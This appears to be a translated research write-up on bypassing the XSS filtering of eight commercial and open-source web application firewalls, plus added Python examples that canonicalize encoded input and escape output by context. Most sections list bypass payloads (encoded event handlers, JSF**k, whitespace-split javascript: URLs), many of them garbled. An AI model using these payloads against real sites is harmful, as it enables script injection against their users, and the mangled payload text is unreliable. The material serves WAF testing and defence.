WAF XSS bypass posture
Because web application firewalls are so widely deployed, it is worth testing how well a WAF actually defends against XSS attacks. All of these experiments make one point: the vendor must eliminate the vulnerability at its root and cannot simply rely on the WAF.
Several popular WAFs were tested and bypassed: F5 Big IP, Imperva Incapsula, AQTRONIX WebKnight, PHP-IDS, Mod-Security, Sucuri, QuickDefense, and Barracuda WAF.
0x01 Introduction
A WAF is an application, server plug-in, or filter that applies a set of rules to HTTP traffic. The rules are usually meant to block common threats such as XSS, SQL injection, and other web-related vulnerabilities. This test focuses only on methods for bypassing the WAF's protection.
0x02 Test environment
Google Chrome
Opera Browser
Mozilla Firefox
Internet Explorer
0x03 Test results
1. Imperva Incapsula
During testing we found that Imperva Incapsula filters many common XSS payloads, yet some go undetected. The only obstacle to bypassing the filter is finding a usable action for the event handler: alert(), prompt(), confirm(), and eval() are all blocked, so another way of proving that the XSS vulnerability exists has to be found.
1.1 First bypass
Double URL encoding + HTML encoding + Unicode encoding (works in all browsers)
Double URL encoding works where the server URL-decodes the client-supplied input more than once.
% 3 Cimg % 2 Fsrc % 3D % 22x % 22% 2 Fonerror % 3D % 22 prom % 5Cu0070t % 2526% 2523 x 28% 3B % 2526% 25
23 x 27% 3B % 2526% x 2523 3B % 58% x 2526% 3B % 2523 53% x 2526% 3B % 25
26% 2523 x 29% 3B % 22% 3E
1.2 Second bypass: JSF**k payload (all browsers)
The second bypass is based on JSF**k, a seven-character JavaScript encoding technique. The payload structure is roughly the same as above:
Img/src = "x"/onerror = "[JS-F ** K Payload]">
The action works. The only drawback is the length: most servers impose strict limits on GET request URLs, so this payload is better used in POST requests. Apart from that, it looks perfect.
2. WebKnight
WebKnight is quite different: its filtering rules are updated frequently by the security community. Our experiments show that the two bypasses below only affect WebKnight v4.1; v4.2 is fixed.
2.1 First bypass: ontoggle JS event (Google Chrome)
This one works only in Chrome.
The toggle() method switches an element's visible state: if the selected elements are visible they are hidden, and if they are hidden they are shown. Supported only in Chrome.
Ontoggle = alert (1)>
2.2 Second bypass: onshow JS event (Mozilla Firefox)
This bypass uses the onshow JS event; the user's click (a right-click on the element) triggers the script, bypassing WebKnight's XSS filtering.
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "alert (1)">
3. F5 Big IP
F5 Big IP is regarded as an enterprise-grade application firewall. Bypassing its XSS filtering is not limited to the choice of action.
3.1 First bypass: onwheel JS event + a page height set in the style attribute (Google Chrome & Mozilla Firefox & Opera Browser)
Style = "height: 1000px" onwheel = "[DATA]">
3.2 Second bypass: onshow JS event (Mozilla Firefox)
The user's click triggers the script.
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "[DATA]">
3.3 Third bypass: JSF**k payload (Google Chrome & Mozilla Firefox & Opera Browser)
Style = "height: 1000px" onwheel = "[JS-F ** k Payload]">
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "[JS-F ** k Payload]">
3.4 Fourth bypass: HTML encoding + double URL encoding (Google Chrome & Mozilla Firefox & Opera Browser)
Style = "height: 1000px" onwheel = "prom % 25% 32% 33% 25% 36x70; t (1)">
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "prom % 25% 32% 33% 25% 36x70; t (1)">
4. Barracuda WAF
The results are the same as for F5 Big IP.
4.1
Style = "height: 1000px" onwheel = "alert (1)">
4.2
Contextmenu = "xss"> Right-Click Here id = "xss" onshow = "alert (1)">
5. PHP-IDS
Reviewing the filtering rules, we found that JS events are not on the blacklist. Instead, PHP-IDS's main protection targets the action of the JS event: alert(), for example, is detected immediately, all currently known encoding techniques are filtered, and there are specific rules against the usual payload structures. The protection therefore has to be bypassed by exploiting browser behaviour.
5.1 First bypass: using the browser's response to user input
Bypasses PHP-IDS v0.7.
5.2 Second bypass: double URL encoding
6. Mod-Security
Experiments show that Mod-Security is particularly sensitive to suspicious requests. For example, hello%20onsomething=dosomething is flagged as a potential XSS attack simply because onsomething looks like a JS event. The bypasses therefore rely on weaknesses inside the filtering itself.
6.1 First bypass: newlines and tabs (Google Chrome & Opera Browser & Internet Explorer)
This payload contains a link pointing to a javascript: URL. That is normally detected, but inserting a large number of newlines and tabs bypasses the check.
Href = "j [785 bytes of ()] avasert: alert (1);"> XSS
6.2 Second bypass: US-ASCII encoding (IE6 and IE7 only)
6.3 Third bypass: triple URL encoding
/% 25% 32% 35% 25% 33% 36% 25% 36% 36% 25% 32% 35% 25% 33% 36% 25% 36% 35 mouseover = alert (1)>
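The encoding layers used in 1.1 (double URL encoding plus HTML entities and JavaScript \u escapes), 6.1 (tabs and newlines inside a javascript: URL) and 6.3 (triple URL encoding) all defeat a filter that inspects input after a single decode. The Python canonicalizer below is an added example, not code from this article or from any of the WAFs tested; the rule patterns, the five-round decode cap and the sample inputs are constructed here for illustration. It shows why a detector should reduce input to a fixed point before matching, and why the number of decode rounds must be bounded.

```python
import html
import re
from urllib.parse import unquote

# Constructed stand-ins for WAF signatures (not any vendor's real rules).
RULES = {
    "js_sink": re.compile(r"\b(alert|prompt|confirm|eval)\s*\(", re.IGNORECASE),
    "js_event": re.compile(r"\bon\w+\s*=", re.IGNORECASE),
    "js_scheme": re.compile(r"javascript\s*:", re.IGNORECASE),
}

MAX_DECODE_ROUNDS = 5  # bound the loop: decode-until-stable without a cap is a CPU DoS vector
_JS_UNICODE = re.compile(r"\\u([0-9a-fA-F]{4})")


def url_decode_fully(s, max_rounds=MAX_DECODE_ROUNDS):
    """Percent-decode until the string stops changing.

    Returns (decoded, rounds_used). Double- and triple-encoded input needs
    two and three rounds; plain text needs zero.
    """
    for rounds in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            return s, rounds
        s = decoded
    return s, max_rounds


def canonicalize(raw):
    """Reduce request data to the form a browser would eventually execute.

    Order matters: the server URL-decodes first, the HTML parser then
    resolves entities, and only then does the JS engine see backslash-u escapes.
    """
    s, _ = url_decode_fully(raw)
    s = html.unescape(s)                                         # &#x28; -> (
    s = _JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), s)  # \u0070 -> p
    s = re.sub(r"[\t\n\r]", "", s)  # browsers drop ASCII tab/newline when parsing URLs
    return s


def match_rules(text):
    """Names of the constructed rules that fire on already-decoded text."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))


def naive_check(raw):
    """Decode once, then match: the behaviour the encoding bypasses rely on."""
    return match_rules(unquote(raw))


def canonical_check(raw):
    """Canonicalize to a fixed point, then match."""
    return match_rules(canonicalize(raw))


# Constructed samples modelled on the encoding layers described in the article.
SAMPLE_DOUBLE_ENCODED = "prom%5Cu0070t%2526%2523x28%3B1%2526%2523x29%3B"  # -> prompt(1)
SAMPLE_TRIPLE_ENCODED = "%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover="  # -> onmouseover=
SAMPLE_WHITESPACE_URL = "j\navas\tcript:doSomething()"  # -> javascript:doSomething()

if __name__ == "__main__":
    for sample in (SAMPLE_DOUBLE_ENCODED, SAMPLE_TRIPLE_ENCODED, SAMPLE_WHITESPACE_URL):
        print(repr(sample))
        print("  canonical form:", repr(canonicalize(sample)))
        print("  naive check   :", naive_check(sample))
        print("  canonical     :", canonical_check(sample))
```

Each sample produces no rule hits from naive_check and exactly one from canonical_check. The decode order in canonicalize follows the order in which the server, the HTML parser and the JavaScript engine actually process the data; a filter that applies the layers in a different order, or stops after one, is the kind of filter these bypasses target.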
7. Quick Defense
Quick Defense's filtering rules are currently not sufficient for a production-grade web application. Although many JS events are on its blacklist, some encoding techniques can be used to get around them.
7.1 First bypass: onsearch JS event + Unicode encoding (Google Chrome)
Type = "search" onsearch = "aler \ u0074 (1)">
7.2 Second bypass: ontoggle JS event + Unicode encoding (Google Chrome)
Ontoggle = "aler \ u0074 (1)">
8. Sucuri WAF
Sucuri WAF is equally sensitive to suspicious requests. In April of this year many researchers bypassed Sucuri WAF completely, and all of those findings have since been fixed, so XSS is now only achievable through older browsers.
Bypass method: US-ASCII encoding (IE6 and IE7)
0x04 Summary
It is entirely possible to build an attack vector that bypasses each WAF's filter by exploiting that WAF's particular weaknesses. For vendors, a WAF makes attackers spend more time, but it remains essential to find and fix the underlying vulnerabilities.
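The summary's point, that the application itself must be fixed rather than shielded, comes down to encoding untrusted data for the context it is written into instead of trying to recognise attacks on the way in. The Python snippet below is an added example, not code from this article; escape_text, escape_attr, safe_href, render_profile and the scheme allow-list are constructed here. It covers an HTML text context, a double-quoted attribute context, and a URL attribute where the scheme is allow-listed, so that the kinds of input discussed on this page (event-handler tags, a javascript: URL padded with newlines and tabs) come out as inert text.

```python
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # constructed allow-list for user-supplied links


def escape_text(value):
    """For data placed between tags: & < > are enough, quotes are harmless here."""
    return html.escape(value, quote=False)


def escape_attr(value):
    """For data placed inside a double-quoted attribute: also neutralise quotes."""
    return html.escape(value, quote=True)


def safe_href(url):
    """For data placed in href/src: allow-list the scheme, then attribute-escape.

    Tab and newline are removed first because browsers strip them during URL
    parsing, so a scheme split by whitespace would otherwise pass a naive check.
    Relative URLs (no scheme) are allowed; anything else not on the list is
    replaced by a harmless fragment link.
    """
    cleaned = "".join(ch for ch in url if ch not in "\t\n\r")
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in ALLOWED_SCHEMES:
        return "#"
    return escape_attr(cleaned)


def render_profile(display_name, website, title):
    """Build a fragment that writes untrusted data into three different contexts."""
    return (
        f'<p title="{escape_attr(title)}">{escape_text(display_name)}</p>'
        f'<a href="{safe_href(website)}">website</a>'
    )


if __name__ == "__main__":
    # Constructed inputs of the kinds the article describes.
    print(render_profile('<b>Bob</b>', 'JavaScript:alert(1)', 'x" onshow="alert(1)'))
    print(render_profile('Alice', 'https://example.com/?a=1&b=2', 'plain title'))
```

With output encoding chosen per context, no decode-depth or event-name blacklist is involved at all: the data is simply never interpreted as markup, which is what makes it a root-cause fix rather than a filter.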